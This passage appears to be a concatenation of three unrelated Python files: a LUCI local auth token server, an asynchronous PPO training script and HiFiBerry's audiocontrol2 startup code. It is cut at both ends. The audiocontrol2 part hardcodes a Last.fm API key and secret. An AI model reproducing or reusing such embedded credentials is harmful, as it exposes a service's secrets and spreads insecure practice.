already stopped (due to http.server.HTTPServer implementation that
stupidly leaks handler threads).
Args:
method: name of the invoked RPC method, e.g. "GetOAuthToken".
request: JSON dict with the request body.
Returns:
JSON dict with the response body.
Raises:
RPCError to return non-200 HTTP code and an error message as plain text.
"""
if method == 'GetOAuthToken':
return self.handle_get_oauth_token(request)
if method == 'GetIDToken':
return self.handle_get_id_token(request)
raise RPCError(404, 'Unknown RPC method "%s".' % method)
### RPC method handlers. Called from internal threads.
def handle_get_oauth_token(self, request):
"""Returns an OAuth token representing the task service account.
The returned token is usable for at least 1 min.
Request body:
{
"account_id": <str>,
"scopes": [<str scope1>, <str scope2>, ...],
"secret": <str from LUCI_CONTEXT.local_auth.secret>
}
Response body:
{
"error_code": <int, 0 or missing on success>,
"error_message": <str, optional>,
"access_token": <str with actual token (on success)>,
"expiry": <int with unix timestamp in seconds (on success)>
}
"""
# Validate 'account_id' and 'secret'. 'account_id' is the logical account to
# get a token for (e.g. "task" or "system").
account_id = self.check_account_and_secret(request)
# Validate scopes. It is conceptually a set, so remove duplicates.
scopes = request.get('scopes')
if not scopes:
raise RPCError(400, 'Field "scopes" is required.')
if (not isinstance(scopes, list)
or not all(isinstance(s, str) for s in scopes)):
raise RPCError(400, 'Field "scopes" must be a list of strings.')
scopes = tuple(sorted(set(map(str, scopes))))
# Get the cached token or generate a new one.
tok_or_err = self.get_cached_token(
cache_key=('access_token', account_id, scopes),
refresh_callback=lambda p: p.generate_access_token(account_id, scopes))
# Done.
if isinstance(tok_or_err, AccessToken):
return {
'access_token': tok_or_err.access_token,
'expiry': int(tok_or_err.expiry),
}
if isinstance(tok_or_err, TokenError):
return {
'error_code': tok_or_err.code,
'error_message': str(tok_or_err) or 'unknown',
}
raise AssertionError('impossible')
def handle_get_id_token(self, request):
"""Returns an ID token representing the task service account.
The returned token is usable for at least 1 min.
Request body:
{
"account_id": <str>,
"audience": <str>,
"secret": <str from LUCI_CONTEXT.local_auth.secret>
}
Response body:
{
"error_code": <int, 0 or missing on success>,
"error_message": <str, optional>,
"id_token": <str with actual token (on success)>,
"expiry": <int with unix timestamp in seconds (on success)>
}
"""
# Validate 'account_id' and 'secret'. 'account_id' is the logical account to
# get a token for (e.g. "task" or "system").
account_id = self.check_account_and_secret(request)
# An audience is a string and it is required.
audience = request.get('audience')
if not audience:
raise RPCError(400, 'Field "audience" is required.')
if not isinstance(audience, str):
raise RPCError(400, 'Field "audience" must be a string.')
audience = str(audience)
# Get the cached token or generate a new one.
tok_or_err = self.get_cached_token(
cache_key=('id_token', account_id, audience),
refresh_callback=lambda p: p.generate_id_token(account_id, audience))
# Done.
if isinstance(tok_or_err, AccessToken):
return {
'id_token': tok_or_err.access_token,
'expiry': int(tok_or_err.expiry),
}
if isinstance(tok_or_err, TokenError):
return {
'error_code': tok_or_err.code,
'error_message': str(tok_or_err) or 'unknown',
}
raise AssertionError('impossible')
### Utilities used by RPC handlers. Called from internal threads.
def check_account_and_secret(self, request):
"""Checks 'account_id' and 'secret' fields of the request.
Returns:
Validated account_id.
Raises:
RPCError on validation errors.
"""
# Logical account to get a token for (e.g. "task" or "system").
account_id = request.get('account_id')
if not account_id:
raise RPCError(400, 'Field "account_id" is required.')
if not isinstance(account_id, str):
raise RPCError(400, 'Field "account_id" must be a string')
account_id = str(account_id)
# Validate the secret format.
secret = request.get('secret')
if not secret:
raise RPCError(400, 'Field "secret" is required.')
if not isinstance(secret, str):
raise RPCError(400, 'Field "secret" must be a string.')
secret = str(secret)
# Grab the state from the lock-guarded area.
with self._lock:
if not self._server:
raise RPCError(503, 'Stopped already.')
rpc_secret = self._rpc_secret
accounts = self._accounts
# Use constant time check to prevent malicious processes from discovering
# the secret byte-by-byte measuring response time.
if not constant_time_equals(secret, rpc_secret):
raise RPCError(403, 'Invalid "secret".')
# Make sure we know about the requested account.
if not any(account_id == acc.id for acc in accounts):
raise RPCError(404, 'Unrecognized account ID %r.' % account_id)
return account_id
def get_cached_token(self, cache_key, refresh_callback):
"""Grabs a token from the cache, refreshing it if necessary.
Cache keys have two forms:
* ('access_token', account_id, tuple of scopes) - for access tokens.
* ('id_token', account_id, audience) - for ID tokens.
Args:
cache_key: a tuple with the cache key identifying the token.
refresh_callback: will be called as refresh_callback(token_provider) to
refresh the token if the cached one has expired. Must return
AccessToken or raise TokenError.
Returns:
Either AccessToken or TokenError.
Raises:
RPCError on internal errors.
"""
# Grab the token (or a fatal error) from the memory cache, check token's
# expiration time. Grab _token_provider while we are holding the lock.
with self._lock:
if not self._server:
raise RPCError(503, 'Stopped already.')
tok_or_err = self._cache.get(cache_key)
if isinstance(tok_or_err, TokenError):
return tok_or_err # cached fatal error
if isinstance(tok_or_err, AccessToken) and not should_refresh(tok_or_err):
return tok_or_err # an up-to-date token
# Here tok_or_err is either None or a stale AccessToken. We'll refresh it.
token_provider = self._token_provider
# Do the refresh outside of the RPC server lock to unblock other clients
# that are hitting the cache. The token provider should implement its own
# synchronization.
try:
tok_or_err = refresh_callback(token_provider)
assert isinstance(tok_or_err, AccessToken), tok_or_err
except TokenError as exc:
tok_or_err = exc
# Cache the token or fatal errors (to avoid useless retry later).
with self._lock:
if not self._server:
raise RPCError(503, 'Stopped already.')
self._cache[cache_key] = tok_or_err
return tok_or_err
def constant_time_equals(a, b):
"""Compares two strings in constant time regardless of theirs content."""
if len(a) != len(b):
return False
result = 0
for x, y in zip(a, b):
result |= ord(x) ^ ord(y)
return result == 0
def should_refresh(tok):
"""Returns True if the token must be refreshed because it expires soon."""
# LUCI_CONTEXT protocol requires that returned tokens are alive for at least
# 2.5 min. See LUCI_CONTEXT.md. Add 30 sec extra of leeway.
return time.time() > tok.expiry - 3*60
class _HTTPServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
"""Used internally by LocalAuthServer."""
# How often to poll 'select' in local HTTP server.
#
# Defines minimal amount of time 'stop' would block. Overridden in tests to
# speed them up.
poll_interval = 0.5
# From socketserver.ThreadingMixIn.
daemon_threads = True
# From http.server.HTTPServer.
request_queue_size = 50
def __init__(self, local_auth_server, addr):
http.server.HTTPServer.__init__(self, addr, _RequestHandler)
self.local_auth_server = local_auth_server
def serve_forever(self, poll_interval=None):
"""Overrides default poll interval."""
http.server.HTTPServer.serve_forever(self, poll_interval
or self.poll_interval)
def handle_error(self, _request, _client_address):
"""Overrides default handle_error that dumbs stuff to stdout."""
logging.exception('local auth server: Exception happened')
ERROR_MESSAGE = """\
Error code: %(code)d
Message: %(message)s
Explanation: %(explain)s
"""
class _RequestHandler(http.server.BaseHTTPRequestHandler):
"""Used internally by LocalAuthServer.
Parses the request, serializes and write the response.
"""
# Buffer the reply, no need to send each line separately.
wbufsize = -1
# Overrides to send 'text/plain' error response.
error_message_format = ERROR_MESSAGE
error_content_type = 'text/plain;charset=utf-8'
def log_message(self, fmt, *args): # pylint: disable=arguments-differ
"""Overrides default log_message to not abuse stderr."""
logging.debug('local auth server: ' + fmt, *args)
def do_POST(self):
"""Implements POST handler."""
# Parse URL to extract method name.
m = re.match(r'^/rpc/LuciLocalAuthService\.([a-zA-Z0-9_]+)$', self.path)
if not m:
self.send_error(404, 'Expecting /rpc/LuciLocalAuthService.*')
return
method = m.group(1)
# The request body MUST be JSON. Ignore charset, we don't care.
ct = self.headers.get('content-type')
if not ct or ct.split(';')[0] != 'application/json':
self.send_error(
400, 'Expecting "application/json" Content-Type, got %r' % ct)
return
# Read the body. Chunked transfer encoding or compression is no supported.
try:
content_len = int(self.headers['content-length'])
except ValueError:
self.send_error(400, 'Missing on invalid Content-Length header')
return
try:
req = json.loads(self.rfile.read(content_len))
except ValueError as exc:
self.send_error(400, 'Not a JSON: %s' % exc)
return
if not isinstance(req, dict):
self.send_error(400, 'Not a JSON dictionary')
return
# Let the LocalAuthServer handle the request. Prepare the response body.
try:
resp = self.server.local_auth_server.handle_rpc(method, req)
response_body = json.dumps(resp) + '\n'
except RPCError as exc:
self.send_error(exc.code, str(exc))
return
except Exception as exc:
self.send_error(500, 'Internal error: %s' % exc)
return
# Send the response.
self.send_response(200)
self.send_header('Connection', 'close')
self.send_header('Content-Length', str(len(response_body)))
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(response_body.encode('utf-8'))
def testing_main():
"""Launches a local HTTP auth service and waits for Ctrl+C.
Useful during development and manual testing.
"""
# Don't mess with sys.path outside of adhoc testing.
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
from libs import luci_context
logging.basicConfig(level=logging.DEBUG)
class DumbProvider:
def generate_access_token(self, account_id, scopes):
logging.info('generate_access_token(%r, %r) called', account_id, scopes)
return AccessToken('fake_access_tok_%s' % account_id, time.time() + 300)
def generate_id_token(self, account_id, audience):
logging.info('generate_id_token(%r, %r) called', account_id, audience)
return AccessToken('fake_id_tok_%s' % account_id, time.time() + 300)
server = LocalAuthServer()
ctx = server.start(
token_provider=DumbProvider(),
accounts=[
Account('a', 'a@example.com'),
Account('b', 'b@example.com'),
Account('c', 'c@example.com'),
],
default_account_id='a',
port=11111)
try:
with luci_context.write(local_auth=ctx):
print('Copy-paste this into another shell:')
print('export LUCI_CONTEXT=%s' % os.getenv('LUCI_CONTEXT'))
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
finally:
server.stop()
if __name__ == '__main__':
testing_main()
|
train.py
|
#! /usr/bin/env python3
"""
PPO: Proximal Policy Optimization
Written by Patrick Coady (pat-coady.github.io)
Modified by Tin-Yin Lai (wu6u3) into asynchronous version
PPO uses a loss function and gradient descent to approximate
Trust Region Policy Optimization (TRPO). See these papers for
details:
TRPO / PPO:
https://arxiv.org/pdf/1502.05477.pdf (Schulman et al., 2016)
Distributed PPO:
https://arxiv.org/abs/1707.02286 (Heess et al., 2017)
Generalized Advantage Estimation:
https://arxiv.org/pdf/1506.02438.pdf
And, also, this GitHub repo which was helpful to me during
implementation:
https://github.com/joschu/modular_rl
This implementation learns policies for continuous environments
in the OpenAI Gym (https://gym.openai.com/). Testing was focused on
the MuJoCo control tasks.
"""
import gym
import numpy as np
from gym import wrappers
from thread_policy import Policy
from value_function import NNValueFunction
import scipy.signal
from utils import Logger, Scaler
from datetime import datetime
import os
import argparse
import signal
import time
from rmsprop_applier import RMSPropApplier
import threading
from multiprocessing.managers import BaseManager
import multiprocessing as mp
import tensorflow as tf
class MPManager(BaseManager):
pass
MPManager.register('Policy', Policy)
MPManager.register('NNValueFunction', NNValueFunction)
N_WORKERS = 3
RMSP_ALPHA = 0.99
RMSP_EPSILON = 0.1
GRAD_NORM_CLIP = 40.0
DEVICE = device = "/cpu:0"
class GracefulKiller:
""" Gracefully exit program on CTRL-C """
def __init__(self):
self.kill_now = False
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, signum, frame):
self.kill_now = True
def init_gym(env_name):
"""
Initialize gym environment, return dimension of observation
and action spaces.
Args:
env_name: str environment name (e.g. "Humanoid-v1")
Returns: 3-tuple
gym environment (object)
number of observation dimensions (int)
number of action dimensions (int)
"""
env = gym.make(env_name)
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.shape[0]
return env, obs_dim, act_dim
def run_episode(sess, env, policy, scaler, animate=False):
""" Run single episode with option to animate
Args:
env: ai gym environment
policy: policy object with sample() method
scaler: scaler object, used to scale/offset each observation dimension
to a similar range
animate: boolean, True uses env.render() method to animate episode
Returns: 4-tuple of NumPy arrays
observes: shape = (episode len, obs_dim)
actions: shape = (episode len, act_dim)
rewards: shape = (episode len,)
unscaled_obs: useful for training scaler, shape = (episode len, obs_dim)
"""
obs = env.reset()
observes, actions, rewards, unscaled_obs = [], [], [], []
done = False
step = 0.0
scale, offset = scaler.get()
scale[-1] = 1.0 # don't scale time step feature
offset[-1] = 0.0 # don't offset time step feature
while not done:
if animate:
env.render()
obs = obs.astype(np.float32).reshape((1, -1))
obs = np.append(obs, [[step]], axis=1) # add time step feature
unscaled_obs.append(obs)
obs = (obs - offset) * scale # center and scale observations
observes.append(obs)
action = policy.sample(sess, obs).reshape((1, -1)).astype(np.float32)
actions.append(action)
obs, reward, done, _ = env.step(np.squeeze(action, axis=0))
if not isinstance(reward, float):
reward = np.asscalar(reward)
rewards.append(reward)
step += 1e-3 # increment time step feature
return (np.concatenate(observes), np.concatenate(actions),
np.array(rewards, dtype=np.float64), np.concatenate(unscaled_obs))
def run_policy(sess, env, policy, scaler, logger, episodes):
""" Run policy and collect data for a minimum of min_steps and min_episodes
Args:
env: ai gym environment
policy: policy object with sample() method
scaler: scaler object, used to scale/offset each observation dimension
to a similar range
logger: logger object, used to save stats from episodes
episodes: total episodes to run
Returns: list of trajectory dictionaries, list length = number of episodes
'observes' : NumPy array of states from episode
'actions' : NumPy array of actions from episode
'rewards' : NumPy array of (un-discounted) rewards from episode
'unscaled_obs' : NumPy array of (un-discounted) rewards from episode
"""
total_steps = 0
trajectories = []
for _ in range(episodes):
observes, actions, rewards, unscaled_obs = run_episode(sess, env, policy, scaler)
total_steps += observes.shape[0]
trajectory = {'observes': observes,
'actions': actions,
'rewards': rewards,
'unscaled_obs': unscaled_obs}
trajectories.append(trajectory)
unscaled = np.concatenate([t['unscaled_obs'] for t in trajectories])
scaler.update(unscaled) # update running statistics for scaling observations
logger.log({'_MeanReward': np.mean([t['rewards'].sum() for t in trajectories]),
'Steps': total_steps})
return trajectories
def discount(x, gamma):
""" Calculate discounted forward sum of a sequence at each point """
return scipy.signal.lfilter([1.0], [1.0, -gamma], x[::-1])[::-1]
def add_disc_sum_rew(trajectories, gamma):
""" Adds discounted sum of rewards to all time steps of all trajectories
Args:
trajectories: as returned by run_policy()
gamma: discount
Returns:
None (mutates trajectories dictionary to add 'disc_sum_rew')
"""
for trajectory in trajectories:
if gamma < 0.999: # don't scale for gamma ~= 1
rewards = trajectory['rewards'] * (1 - gamma)
else:
rewards = trajectory['rewards']
disc_sum_rew = discount(rewards, gamma)
trajectory['disc_sum_rew'] = disc_sum_rew
def add_value(sess, trajectories, val_func):
""" Adds estimated value to all time steps of all trajectories
Args:
trajectories: as returned by run_policy()
val_func: object with predict() method, takes observations
and returns predicted state value
Returns:
None (mutates trajectories dictionary to add 'values')
"""
for trajectory in trajectories:
observes = trajectory['observes']
values = val_func.predict(sess, observes)
trajectory['values'] = values
def add_gae(trajectories, gamma, lam):
""" Add generalized advantage estimator.
https://arxiv.org/pdf/1506.02438.pdf
Args:
trajectories: as returned by run_policy(), must include 'values'
key from add_value().
gamma: reward discount
lam: lambda (see paper).
lam=0 : use TD residuals
lam=1 : A = Sum Discounted Rewards - V_hat(s)
Returns:
None (mutates trajectories dictionary to add 'advantages')
"""
for trajectory in trajectories:
if gamma < 0.999: # don't scale for gamma ~= 1
rewards = trajectory['rewards'] * (1 - gamma)
else:
rewards = trajectory['rewards']
values = trajectory['values']
# temporal differences
tds = rewards - values + np.append(values[1:] * gamma, 0)
advantages = discount(tds, gamma * lam)
trajectory['advantages'] = advantages
def build_train_set(trajectories):
"""
Args:
trajectories: trajectories after processing by add_disc_sum_rew(),
add_value(), and add_gae()
Returns: 4-tuple of NumPy arrays
observes: shape = (N, obs_dim)
actions: shape = (N, act_dim)
advantages: shape = (N,)
disc_sum_rew: shape = (N,)
"""
observes = np.concatenate([t['observes'] for t in trajectories])
actions = np.concatenate([t['actions'] for t in trajectories])
disc_sum_rew = np.concatenate([t['disc_sum_rew'] for t in trajectories])
advantages = np.concatenate([t['advantages'] for t in trajectories])
# normalize advantages
advantages = (advantages - advantages.mean()) / (advantages.std() + 1e-6)
return observes, actions, advantages, disc_sum_rew
def log_batch_stats(observes, actions, advantages, disc_sum_rew, logger, episode, time):
""" Log various batch statistics """
logger.log({'_mean_obs': np.mean(observes),
'_min_obs': np.min(observes),
'_max_obs': np.max(observes),
'_std_obs': np.mean(np.var(observes, axis=0)),
'_mean_act': np.mean(actions),
'_min_act': np.min(actions),
'_max_act': np.max(actions),
'_std_act': np.mean(np.var(actions, axis=0)),
'_mean_adv': np.mean(advantages),
'_min_adv': np.min(advantages),
'_max_adv': np.max(advantages),
'_std_adv': np.var(advantages),
'_mean_discrew': np.mean(disc_sum_rew),
'_min_discrew': np.min(disc_sum_rew),
'_max_discrew': np.max(disc_sum_rew),
'_std_discrew': np.var(disc_sum_rew),
'_Episode': episode,
'_Time': time
})
def main(env_name, num_episodes, gamma, lam, kl_targ, batch_size, hid1_mult, policy_logvar):
'''
'''
##################
# shared policy #
##################
tic = time.clock()
manarger = MPManager()
manarger.start()
shared_env, shared_obs_dim, shared_act_dim = init_gym(env_name)
shared_obs_dim += 1 # add 1 to obs dimension for time step feature (see run_episode())
now = datetime.utcnow().strftime("%b-%d_%H:%M:%S") # create unique directories
shared_logger = Logger(logname=env_name, now=now+"-Master")
shared_aigym_path = os.path.join('./vedio', env_name, now+"-Master")
#env = wrappers.Monitor(env, aigym_path, force=True)
shared_scaler = Scaler(shared_obs_dim)
shared_val_func = NNValueFunction(shared_obs_dim, hid1_mult, -1, None)
shared_policy = Policy(shared_obs_dim, shared_act_dim, kl_targ, hid1_mult, policy_logvar, -1, None)
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
# lacal policy declair
env_a = [None]*N_WORKERS
obs_dim_a = [None]*N_WORKERS
act_dim_a = [None]*N_WORKERS
logger_a = [None]*N_WORKERS
aigym_path_a = [None]*N_WORKERS
now = datetime.utcnow().strftime("%b-%d_%H:%M:%S") # create unique directories
val_func_a = [None]*N_WORKERS
policy_a = [None]*N_WORKERS
scaler_a = [None]*N_WORKERS
for i in range(N_WORKERS):
env_a[i], obs_dim_a[i], act_dim_a[i] = init_gym(env_name)
obs_dim_a[i] += 1 # add 1 to obs dimension for time step feature (see run_episode())
logger_a[i] = Logger(logname=env_name, now=now+"-"+str(i))
aigym_path_a[i] = os.path.join('./vedio', env_name, now+"-"+str(i))
#env_a[i] = wrappers.Monitor(env, aigym_path, force=True)
scaler_a[i] = Scaler(obs_dim_a[i])
val_func_a[i] = NNValueFunction(obs_dim_a[i], hid1_mult, i, shared_val_func)
val_func_a[i].apply_gradients = grad_applier.apply_gradients(
shared_val_func.get_vars(),
val_func_a[i].gradients )
policy_a[i] = Policy(obs_dim_a[i], act_dim_a[i], kl_targ, hid1_mult, policy_logvar, i, shared_policy)
policy_a[i].apply_gradients = grad_applier.apply_gradients(
shared_policy.get_vars(),
policy_a[i].gradients )
# init tensorflow
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,allow_soft_placement=True))
init = tf.global_variables_initializer()
## start sess
sess.run(init)
## init shared scalar policy
run_policy(sess, shared_env, shared_policy, shared_scaler, shared_logger, episodes=5)
def single_work(thread_idx):
""" training loop
Args:
env_name: OpenAI Gym environment name, e.g. 'Hopper-v1'
num_episodes: maximum number of episodes to run
gamma: reward discount factor (float)
lam: lambda from Generalized Advantage Estimate
kl_targ: D_KL target for policy update [D_KL(pi_old || pi_new)
batch_size: number of episodes per policy training batch
hid1_mult: hid1 size for policy and value_f (mutliplier of obs dimension)
policy_logvar: natural log of initial policy variance
"""
env = env_a[thread_idx]
policy = policy_a[thread_idx]
#obs_dim = obs_dim_a[thread_idx]
#act_dim = act_dim_a[thread_idx]
logger = logger_a[thread_idx]
aigym_path = aigym_path_a[thread_idx]
scaler = scaler_a[thread_idx]
val_func = val_func_a[thread_idx]
print("=== start thread "+str(policy.get_thread_idx())+" "+ policy.get_scope()+" ===")
print(shared_policy.get_vars())
print(policy.get_vars())
# run a few episodes of untrained policy to initialize scaler:
#run_policy(sess, env, policy, scaler, logger, episodes=5)
#policy.sync(shared_policy)
#val_func.sync(shared_val_func)
episode = 0
while episode < num_episodes:
## copy global var into local
sess.run( policy.sync)
sess.run(val_func.sync)
## compute new model on local policy
trajectories = run_policy(sess, env, policy, scaler, logger, episodes=batch_size)
episode += len(trajectories)
add_value(sess, trajectories, val_func) # add estimated values to episodes
add_disc_sum_rew(trajectories, gamma) # calculated discounted sum of Rs
add_gae(trajectories, gamma, lam) # calculate advantage
# concatenate all episodes into single NumPy arrays
observes, actions, advantages, disc_sum_rew = build_train_set(trajectories)
# add various stats to training log:
log_batch_stats(observes, actions, advantages, disc_sum_rew, logger, episode, time.clock()-tic)
policy.update(sess, observes, actions, advantages, logger) # update policy
val_func.fit(sess, observes, disc_sum_rew, logger) # update value function
#cur_learning_rate = self._anneal_learning_rate(global_t)
feed_dict = {
policy.old_log_vars_ph: policy.old_log_vars_np,
policy.old_means_ph: policy.old_means_np,
policy.obs_ph: observes,
policy.act_ph: actions,
policy.advantages_ph: advantages,
policy.beta_ph: policy.beta,
policy.lr_ph: policy.lr,
policy.eta_ph: policy.eta,
learning_rate_input: policy.lr
}
sess.run( policy.apply_gradients, feed_dict)
shared_policy.update(sess, observes, actions, advantages, shared_logger)
feed_dict = {
val_func.obs_ph: observes,
val_func.val_ph: disc_sum_rew,
learning_rate_input: val_func.lr
}
sess.run( val_func.apply_gradients, feed_dict)
shared_val_func.fit(sess, observes, disc_sum_rew, shared_logger)
shared_logger.log({'_Time':time.clock()-tic})
logger.write(display=True) # write logger results to file and stdout
logger.close()
## end def single work
train_threads = []
for i in range(N_WORKERS):
train_threads.append(threading.Thread(target=single_work, args=(i,)))
[t.start() for t in train_threads]
[t.join() for t in train_threads]
saver = tf.train.Saver()
for i in range(N_WORKERS):
logger_a[i].close()
#path = os.path.join('log-files', env_name, now+'-Master', 'checkpoint')
#saver.save(sess, path )
sess.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=('Train policy on OpenAI Gym environment '
'using Proximal Policy Optimizer'))
parser.add_argument('env_name', type=str, help='OpenAI Gym environment name')
parser.add_argument('-n', '--num_episodes', type=int, help='Number of episodes to run',
default=1000)
parser.add_argument('-g', '--gamma', type=float, help='Discount factor', default=0.995)
parser.add_argument('-l', '--lam', type=float, help='Lambda for Generalized Advantage Estimation',
default=0.98)
parser.add_argument('-k', '--kl_targ', type=float, help='D_KL target value',
default=0.003)
parser.add_argument('-b', '--batch_size', type=int,
help='Number of episodes per training batch',
default=20)
parser.add_argument('-m', '--hid1_mult', type=int,
help='Size of first hidden layer for value and policy NNs'
'(integer multiplier of observation dimension)',
default=10)
parser.add_argument('-v', '--policy_logvar', type=float,
help='Initial policy log-variance (natural log of variance)',
default=-1.0)
args = parser.parse_args()
main(**vars(args))
|
audiocontrol2.py
|
'''
Copyright (c) 2019 Modul 9/HiFiBerry
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
This is the main audio control process that reads the configuration file,
initializes all subsystems and starts the required threads.
Functionality is implemented in the ac2.* modules
'''
import signal
import configparser
import logging
import os
import sys
import threading
from usagecollector.client import report_activate
from ac2.controller import AudioController
import ac2.data.lastfm as lastfmdata
from ac2.plugins.metadata.lastfm import LastFMScrobbler
from ac2.webserver import AudioControlWebserver
from ac2.alsavolume import ALSAVolume
from ac2.metadata import Metadata
import ac2.metadata
from ac2.data.mpd import MpdMetadataProcessor
from ac2.players.mpdcontrol import MPDControl
from ac2.players.vollibrespot import VollibspotifyControl
from ac2.players.vollibrespot import MYNAME as SPOTIFYNAME
from ac2 import watchdog
mpris = AudioController()
startup_command = None
def pause_all(signalNumber=None, frame=None):
"""
Pause all players on SIGUSR1
"""
if mpris is not None:
mpris.pause_all()
def print_state(signalNumber=None, frame=None):
"""
Display state on USR2
"""
if mpris is not None:
print("\n" + str(mpris))
def create_object(classname, param = None):
# [module_name, class_name] = classname.rsplit(".", 1)
# module = __import__(module_name)
# my_class = getattr(module, class_name)
import importlib
module_name, class_name = classname.rsplit(".", 1)
MyClass = getattr(importlib.import_module(module_name), class_name)
if param is None:
instance = MyClass()
else:
instance = MyClass(param)
return instance
def parse_config(debugmode=False):
server = None
config = configparser.ConfigParser()
config.optionxform = lambda option: option
config.read("/etc/audiocontrol2.conf")
# Auto pause for mpris players
auto_pause = False
if "mpris" in config.sections():
auto_pause = config.getboolean("mpris", "auto_pause",
fallback=False)
loop_delay = config.getint("mpris", "loop_delay",
fallback=1)
mpris.loop_delay = loop_delay
ignore_players = []
for p in config.get("mpris", "ignore",
fallback="").split(","):
playername = p.strip()
ignore_players.append(playername)
logging.info("Ignoring player %s", playername)
mpris.ignore_players = ignore_players
logging.debug("setting auto_pause for MPRIS players to %s",
auto_pause)
mpris.auto_pause = auto_pause
# Web server
if config.getboolean("webserver", "enable", fallback=False):
logging.debug("starting webserver")
port = config.getint("webserver",
"port",
fallback=80)
token = config.get("webserver", "authtoken", fallback=None)
server = AudioControlWebserver(port=port, authtoken=token, debug=debugmode)
mpris.register_metadata_display(server)
server.set_player_control(mpris)
server.add_updater(mpris)
server.start()
watchdog.add_monitored_thread(server, "webserver")
report_activate("audiocontrol_webserver")
logging.info("started web server on port %s", port)
else:
logging.error("web server disabled")
# LastFMScrobbler/LibreFM
if "lastfm" in config.sections():
network = config.get("lastfm", "network",
fallback="lastfm").lower()
username = config.get("lastfm", "username",
fallback=None)
password = config.get("lastfm", "password",
fallback=None)
if network == "lastfm":
apikey = "7d2431d8bb5608574b59ea9c7cfe5cbd"
apisecret = "4722fea27727367810eb550759fa479f"
elif network == "librefm":
apikey = "hifiberry"
apisecret = "hifiberryos"
logging.info("Last.FM network %s", network)
if network is not None:
anon = False
if username is None or username == "" or \
password is None or password == "":
logging.info("using %s anonymously, not scrobbling", network)
username = None
password = None
anon = True
if not(anon):
try:
lastfmscrobbler = LastFMScrobbler(apikey,
apisecret,
username,
password,
None,
network)
mpris.register_metadata_display(lastfmscrobbler)
logging.info("scrobbling to %s as %s", network, username)
lastfmdata.set_lastfmuser(username)
if server is not None:
server.add_lover(lastfmscrobbler)
Metadata.loveSupportedDefault = True
report_activate("audiocontrol_lastfm_scrobble")
except Exception as e:
logging.error("error setting up lastfm module: %s", e)
else:
logging.info("Last.FM not configured")
# Watchdog
if "watchdog" in config.sections():
for player in config["watchdog"]:
services = config["watchdog"][player].split(",")
watchdog.player_mapping[player] = services
logging.info("configuring watchdog %s: %s",
player, services)
# Volume
volume_control = None
if "volume" in config.sections():
mixer_name = config.get("volume",
"mixer_control",
fallback=None)
if mixer_name is not None:
volume_control = ALSAVolume(mixer_name)
logging.info("monitoring mixer %s", mixer_name)
if server is not None:
volume_control.add_listener(server)
server.volume_control = volume_control
volume_control.start()
watchdog.add_monitored_thread(volume_control, "volume control")
mpris.set_volume_control(volume_control)
report_activate("audiocontrol_volume")
if volume_control is None:
logging.info("volume control not configured, "
"disabling volume control support")
# Additional controller modules
for section in config.sections():
if section.startswith("controller:"):
[_,classname] = section.split(":",1)
try:
params = config[section]
controller = create_object(classname, params)
controller.set_player_control(mpris)
controller.set_volume_control(volume_control)
controller.start()
logging.info("started controller %s", controller)
report_activate("audiocontrol_controller_"+classname)
except Exception as e:
logging.error("Exception during controller %s initialization",
classname)
logging.exception(e)
if section.startswith("metadata:"):
[_,classname] = section.split(":",1)
try:
params = config[section]
metadata_display = create_object(classname, params)
mpris.register_metadata_display(metadata_display)
volume_control.add_listener(metadata_display)
logging.info("registered metadata display %s", controller)
report_activate("audiocontrol_metadata_"+classname)
except Exception as e:
logging.error("Exception during controller %s initialization",
classname)
logging.exception(e)
# Metadata push to GUI
if "metadata_post" in config.sections():
try:
from ac2.plugins.metadata.http_post import MetadataHTTPRequest
url = config.get("metadata_post",
"url",
fallback=None)
if url is None:
logging.error("can't activate metadata_post, url missing")
else:
logging.info("posting metadata to %s", url)
metadata_pusher = MetadataHTTPRequest(url)
mpris.register_metadata_display(metadata_pusher)
except Exception as e:
logging.error("can't activate metadata_post: %s", e)
# Metadata push to GUI
if "volume_post" in config.sections():
if volume_control is None:
logging.info("volume control not configured, "
"can't use volume_post")
try:
from ac2.plugins.volume.http import VolumeHTTPRequest
url = config.get("volume_post",
"url",
fallback=None)
if url is None:
logging.error("can't activate volume_post, url missing")
else:
logging.info("posting volume changes to %s", url)
volume_pusher = VolumeHTTPRequest(url)
volume_control.add_listener(volume_pusher)
except Exception as e:
logging.error("can't activate volume_post: %s", e)
# Native MPD backend and metadata processor
if "mpd" in config.sections():
mpdc = MPDControl()
mpdc.start()
mpris.register_nonmpris_player("mpd",mpdc)
logging.info("registered non-MPRIS mpd backend")
mpddir=config.get("mpd", "musicdir",fallback=None)
if mpddir is not None:
mpdproc = MpdMetadataProcessor(mpddir)
mpris.register_metadata_processor(mpdproc)
logging.info("added MPD cover art handler on %s",mpddir)
# Vollibrespot
vlrctl = VollibspotifyControl()
vlrctl.start()
mpris.register_nonmpris_player(SPOTIFYNAME,vlrctl)
# Other settings
if "privacy" in config.sections():
extmd = config.getboolean("privacy",
"external_metadata",
fallback=True)
